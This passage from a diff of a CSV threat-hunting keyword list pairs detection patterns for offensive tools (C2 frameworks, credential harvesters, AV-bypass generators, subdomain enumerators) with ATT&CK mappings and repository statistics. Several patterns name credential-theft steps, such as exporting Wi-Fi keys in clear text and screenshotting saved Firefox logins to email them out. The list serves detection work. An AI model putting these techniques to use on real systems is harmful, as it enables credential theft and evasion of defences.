T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","866","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" -"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*stop-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*stormshadow07*","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","9","867","179","2020-04-28T20:17:54Z","2018-02-17T11:46:40Z" +"*STRING firefox about:logins*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox 
about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*String netsh wlan export profile key=clear*","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*strip_bof.ps1*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" -"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*strip2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*strip-bof -Path *","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*StrongLoader_x64.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*struts_ext_v2.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*su rootz*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" -"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. 
as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3150","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" -"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subbrute*","offensive_tool_keyword","subbrute","SubBrute is a community driven project with the goal of creating the fastest. 
and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/TheRook/subbrute","1","1","N/A","N/A","10","3151","653","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z" +"*subdomain_takeovers.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*subdomains-100.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-10000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - 
TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*subdomains-top1million-110000.txt*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" -"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*subdomains-top1million-20000.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*subdomains-uk-1000.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomains-uk-500.txt*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*subdomain-wordlist.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*subfinder -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*subfinder -silent -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*subfinder --silent*","offensive_tool_keyword","thoth","Automate recon for red team 
assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8298","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" +"*subfinder*","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/subfinder/subfinder","1","0","N/A","N/A","10","8302","1128","2023-10-02T15:13:41Z","2018-03-31T09:44:57Z" "*sublist3r -v -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. 
The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8697","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" +"*Sublist3r*","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","10","8700","2020","2023-10-01T21:58:10Z","2015-12-15T00:55:25Z" "*Suborner.exe*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Suborner-master.zip*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" -"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes 
and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*Successfully connected* spawning shell?*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*Successfully cracked account password*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*Successfully dumped SAM and SYSTEM*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*sudo bloodhound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*sudo -nS id' && lse_sudo=true*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*sudo tmux new -s icebreaker*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*sudo_inject*","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nongiach/sudo_inject","1","1","N/A","N/A","7","649","122","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z" "*SUDO_KILLER*","offensive_tool_keyword","SUDO_KILLER","sudo exploitation #Abusing sudo #Exploiting Sudo #Linux Privilege Escalation #OSCP If you like the tool and for my personal motivation so as to develop other tools please a +1 star The tool can be used by pentesters. system admins. CTF players. students. 
System Auditors and trolls :).","T1078 - T1059 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/TH3xACE/SUDO_KILLER","1","1","N/A","N/A","10","1977","244","2023-08-02T08:53:48Z","2018-12-07T21:08:02Z" -"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"*sudomy.git*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*sudopwn.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*SUID3NUM -*","offensive_tool_keyword","SUID3NUM","A standalone python2/3 script which utilizes pythons built-in modules to find SUID bins. separate default bins from custom bins. cross-match those with bins in GTFO Bins repository & auto-exploit those. all with colors! ( ?? ?? 
??)","T1168 - T1553 - T1210 - T1059","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Anon-Exploiter/SUID3NUM","1","0","N/A","N/A","6","570","129","2021-08-15T20:37:50Z","2019-10-12T07:40:24Z" "*sullo/nikto*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*SunloginClient_11.0.0.33162_X64.exe*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*superhedgy/AttackSurfaceMapper*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*supershell*winpty-agent.exe*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*surajpkhetani/AutoSmuggle*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*Supernova.exe -*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","0","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*Supernova-main.zip*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*supershell*winpty.dll*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
